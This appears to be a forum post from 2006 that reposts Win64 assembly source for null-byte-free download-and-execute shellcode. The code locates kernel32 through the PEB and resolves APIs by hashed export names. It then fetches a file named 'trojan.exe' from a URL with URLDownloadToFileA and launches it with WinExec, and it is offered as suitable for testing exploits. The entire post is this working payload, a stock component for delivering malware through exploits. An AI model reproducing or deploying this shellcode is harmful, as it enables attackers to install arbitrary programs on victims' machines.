
ring04h 2006-10-19 22:10

win64 (URLDownloadToFileA) download and execute 218+ bytes

[code]<pre>;<br />; dexec64.asm - 218+ bytes (unoptimised)<br />;<br />; Win64 asm code, download & execute file using URLDownloadToFileA moniker & WinExec<br />;<br />; tested on AMD64 running Windows x64 SP1<br />;<br />; there probably are errors in the code, but this is more of an experimental source if nothing else.<br />; send corrections or errors to: 'weiss' wyse101 [at] gmail [dot] com<br />; code is not optimised at all, doesn't contain null bytes, so is possibly suitable for testing exploits on win64<br />;<br />; one of the main stumbling blocks in coding x64 asm on windows is the alignment of the stack.<br />; it must be aligned by 16 bytes because windows uses 128-bit SSE2, otherwise the api call will fail.<br />;<br />; thanx:<br />;<br />; roy g biv/29a - [url]http://www.29a.net/[/url]<br />; Feryno - [url]http://feryno.host.sk[/url]<br />; Tomasz Grysztar - [url]http://flatassembler.org[/url]<br />;<br />format PE64 console 4.0<br />entry entrypoint<br /><br />section '.text' code readable writeable executable     ; assumed to be writeable when in memory, no NX obstruction!<br /><br />                                           ; 1*8 is used rather than 0*8 because it uses null byte<br />LoadLibraryA         equ  rbp+1*8          ; using rbp is smaller than using ebp on 64-bit<br />WinExec              equ  rbp+2*8<br />URLDownloadToFileA   equ  rbp+3*8          ; must be rbp because of 64-bit URLMON base address<br /><br />entrypoint:<br />   jmp get_eip<br />load_dta:<br />   pop  rax<br />   push rax<br />   lea  r15,[rax-(setup_stack-hashes)]<br />   inc  byte [rax-(setup_stack-url_end)]          ; nullify tail end of url<br />   inc  byte [rax-(setup_stack-fname_end)]        ; nullify end of filename<br />   inc  byte [rax-(setup_stack-url_mon_end)]      ; nullify end of URLMON<br />   ret                                            ; go!<br /><br />hashes:<br />   dw  0bb86h         ; LoadLibraryA()     635bbb86<br />   dw  0a333h         ; 
WinExec()          208da333<br /><br />   db  'URLMON',0ffh,0ffh<br />url_mon_end   =   $-2<br /><br />   dw  05f92h         ; URLDownloadToFileA    c91e5f92<br />   dq  -1<br />fname:<br />   db  'trojan.exe',0ffh                        ; what to save as<br />fname_end  =   $-1<br /><br />url:<br />   db  'http://localhost/trojan.exe',0ffh       ; where to download file from<br />url_end  =   $-1<br /><br />get_eip:<br />   call  load_dta<br />setup_stack:<br />   add  rsp,-(4*8)    ; 3 api variables, + 1 for avoiding null :-|<br />   push  rsp<br />   pop  rbp           ; rbp = table of api<br />   mov  rdi,rbp       ; rdi points to table also<br />   stosq              ; doesn't really do anything.<br />   add  rsp,-(11*8)   ; reserve space for windows, when calling api<br /><br />   push 60h           ; Hello, Ratter. 8-D<br />   pop rcx<br />   mov rax,[gs:rcx]   ; Peb<br />   mov rax,[rax+18h]  ; PebLdr<br />   mov rsi,[rax+30h]  ; Ldr.InInitializationOrderModuleList<br />   lodsq              ; skip ntdll.dll<br />   mov rbx,[rax+10h]  ; kernel32.dll base<br /><br />   mov cl,2                     ; get 2 api first<br />get_apis_loop:<br />   mov  eax,dword[rbx+3ch]      ; MZ header size<br />   lea  rsi,[rbx+rax+78h]       ; export directory begins at 88h<br />   mov  eax,dword[rsi+10h]      ; extra instructions needed to avoid null bytes<br />   lea  rsi,[rbx+rax+1ch]<br /><br />   lodsd<br />   lea  r9,[rax+rbx]<br />   lodsd<br />   lea  r10,[rax+rbx]<br />   lodsd<br />   lea  r11,[rax+rbx]<br />   xor  r12,r12<br />load_index:<br />   mov  esi,dword[r10+4*r12]<br />   add  rsi,rbx<br />   inc  r12<br />   xor  eax,eax<br />   cdq<br />hash_export:<br />   lodsb<br />   add  edx,eax<br />   rol  edx, 5<br />   dec  eax<br />   jns  hash_export<br />   ror  edx, 5<br />   cmp  dx,word [r15]            ; found api?<br />   jne  load_index<br /><br />   movzx  edx,word [r11+2*r12-2]<br />   mov  eax,[r9+4*rdx]<br />   add  rax,rbx<br />   add  r15,2        
          ; skip hash<br /><br />   stosq                       ; save api address<br />   loop get_apis_loop<br /><br />   push  r15                   ; push/pop to avoid null with mov<br />   pop  rcx<br />   call  qword[LoadLibraryA]<br /><br />   xchg  rax,rbx<br />   add  r15,8                   ; skip URLMON, first time.<br />   push  1                      ; get 1 api from URLMON<br />   pop  rcx<br />   test  rbx,rbx                ; continue if not zero<br />   jne   get_apis_loop<br /><br />   dec  ecx<br />   push  rbx<br />   sub  rsp,3*8                 ; needed to align stack<br />   xor  r9,r9<br />   mov  r8,r15<br />   lea  rdx,[r8+(url-fname)]<br />   call  qword[URLDownloadToFileA]<br /><br />   push 1<br />   pop  rdx<br />   mov rcx,r15<br />   call  qword[WinExec]       ; WinExec("trojan.exe",SW_SHOWNORMAL??);<br /><br />   ;jmp   $                   ; hang<br /><br />   call qword[ExitProcess]    ; not required, testing only<br /><br />; section below not required, simply for testing.<br />section '.idata' import data readable writeable<br /><br />  dd 0,0,0,RVA kernel_name,RVA kernel_table<br />  dd 0,0,0,0,0<br /><br />  kernel_table:<br />    ExitProcess dq RVA _ExitProcess<br />    dq 0<br /><br />  kernel_name db 'KERNEL32.DLL',0<br /><br />  _ExitProcess dw 0<br />    db 'ExitProcess',0<br /><br />[/code]<br /></pre>
